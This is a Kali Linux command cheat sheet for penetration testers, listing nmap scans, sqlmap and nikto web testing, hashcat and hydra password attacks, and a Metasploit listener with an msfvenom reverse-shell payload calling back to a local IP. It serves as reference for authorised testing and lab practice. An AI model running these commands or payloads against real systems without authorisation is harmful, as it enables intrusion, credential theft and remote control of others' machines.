Kali Linux Commands Cheat Sheet

Kali Linux commands cheat sheet reference

Last updated: July 2026

A reference for the commands you'll actually type during a Kali Linux session — system maintenance, network recon, web testing, password attacks, and Metasploit. For full installation steps, see Kali Linux: Install and First Steps.

Contents
  1. System Update and Maintenance
  2. Network Reconnaissance
  3. Web Application Testing
  4. Password Attacks
  5. Metasploit Framework
  6. Wireless Testing
  7. Service and Database Management
  8. Common File Locations
  9. tmux for Long-Running Engagements
  10. OSINT and Enumeration
  11. VPN for Lab Platforms
  12. Frequently Asked Questions
    1. Is there an official PDF version of this cheat sheet?
    2. What's the difference between apt install and the kali-tools metapackages?
    3. Why does msfconsole say "No database connected"?
    4. Where do I find more wordlists than the default rockyou.txt?
    5. Further Reading

System Update and Maintenance

# Update and upgrade — always use full-upgrade on Kali (rolling release)
sudo apt update && sudo apt full-upgrade -y
sudo apt autoremove -y

# Kali's post-install configuration tool (hardening, mirrors, metapackages, shell)
kali-tweaks

# List available Kali tool metapackages
apt-cache search kali-tools | sort

# Install a metapackage by discipline
sudo apt install -y kali-tools-web
sudo apt install -y kali-tools-wireless
sudo apt install -y kali-tools-passwords
sudo apt install -y kali-tools-exploitation
sudo apt install -y kali-tools-forensics

Network Reconnaissance

# Host discovery on a subnet
nmap -sn 192.168.1.0/24

# Standard recon: service versions + default scripts
nmap -sV -sC -p- 192.168.1.50

# OS fingerprinting
nmap -O 192.168.1.50

# Aggressive scan (OS, version, scripts, traceroute)
nmap -A 192.168.1.50

# Save results in all formats
nmap -sV -sC -oA scan_results 192.168.1.50

# Scan a target list
nmap -iL targets.txt -sV -oA results

Web Application Testing

# Nikto — quick web server scan
nikto -h http://target-ip

# Directory brute-forcing
feroxbuster -u http://target-ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# SQL injection testing
sqlmap -u "http://target-ip/page?id=1" --dbs

# Launch Burp Suite
burpsuite &

Password Attacks

# Decompress the default wordlist
sudo gunzip /usr/share/wordlists/rockyou.txt.gz

# Identify a hash type
hashid '$6$rounds=5000$...'

# Hashcat by hash mode
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt     # MD5
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt  # NTLM
hashcat -m 1800 hashes.txt /usr/share/wordlists/rockyou.txt  # SHA-512crypt

# John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --show hashes.txt

# Online service brute force (SSH example)
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.50

Metasploit Framework

# Initialize and verify the database
sudo msfdb init
msfconsole -q -x "db_status; exit"

# Inside msfconsole
msf6> search type:exploit platform:linux
msf6> search cve:2021-44228
msf6> use exploit/multi/handler
msf6> set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6> set LHOST 192.168.1.100
msf6> set LPORT 4444
msf6> run

# Generate a payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe

Wireless Testing

# List wireless interfaces
iwconfig

# Kill interfering processes before monitor mode
sudo airmon-ng check kill

# Enable monitor mode
sudo airmon-ng start wlan0

# Scan for networks
sudo airodump-ng wlan0mon

# Capture a specific network
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Restore managed mode
sudo airmon-ng stop wlan0mon
sudo systemctl restart NetworkManager

Service and Database Management

# PostgreSQL — required by Metasploit
sudo systemctl start postgresql
sudo systemctl enable postgresql

# Initialize or reinitialize the Metasploit database
sudo msfdb init
sudo msfdb reinit

# Check what's listening
sudo ss -tulpn

# List and manage services generally
systemctl list-units --type=service --state=running
sudo systemctl status ssh

Common File Locations

# Wordlists
/usr/share/wordlists/rockyou.txt.gz
/usr/share/wordlists/dirbuster/
/usr/share/wordlists/dirb/

# Nmap scripts
/usr/share/nmap/scripts/

# Metasploit modules
/usr/share/metasploit-framework/modules/

# SecLists (if installed separately)
sudo apt install seclists
/usr/share/seclists/

tmux for Long-Running Engagements

# Start a named session — survives SSH disconnects
tmux new -s engagement

# Detach without killing the session
# (inside tmux) Ctrl+b then d

# Reattach later
tmux attach -t engagement

# List sessions
tmux ls

OSINT and Enumeration

# theHarvester — emails, subdomains, names from public sources
theHarvester -d target.com -b all

# Subdomain enumeration
sudo apt install -y amass
amass enum -d target.com

# WHOIS and DNS lookups
whois target.com
dig target.com ANY
dig -x 192.168.1.50   # reverse lookup

# Recon-ng — modular OSINT framework
recon-ng
[recon-ng][default]> marketplace install all
[recon-ng][default]> workspaces create target_engagement

VPN for Lab Platforms

# Connect to HackTheBox / TryHackMe lab VPN
sudo apt install -y openvpn
sudo openvpn --config your-lab.ovpn

# Verify the tunnel
ip a show tun0

Frequently Asked Questions

Is there an official PDF version of this cheat sheet?

Offensive Security doesn't publish one officially. This page covers the commands used most often across recon, web testing, password attacks, and Metasploit — bookmark it instead of hunting for a PDF that goes stale.

What's the difference between apt install and the kali-tools metapackages?

Metapackages like kali-tools-web install a curated group of tools for a discipline in one command instead of installing each tool individually by name.

Why does msfconsole say "No database connected"?

PostgreSQL isn't running or the Metasploit database wasn't initialized. Run sudo systemctl start postgresql followed by sudo msfdb reinit, then confirm with msfconsole -q -x "db_status; exit".

Where do I find more wordlists than the default rockyou.txt?

Install SecLists (sudo apt install seclists) for a much larger collection covering usernames, passwords, web content discovery, and fuzzing payloads, organized under /usr/share/seclists/.


Go up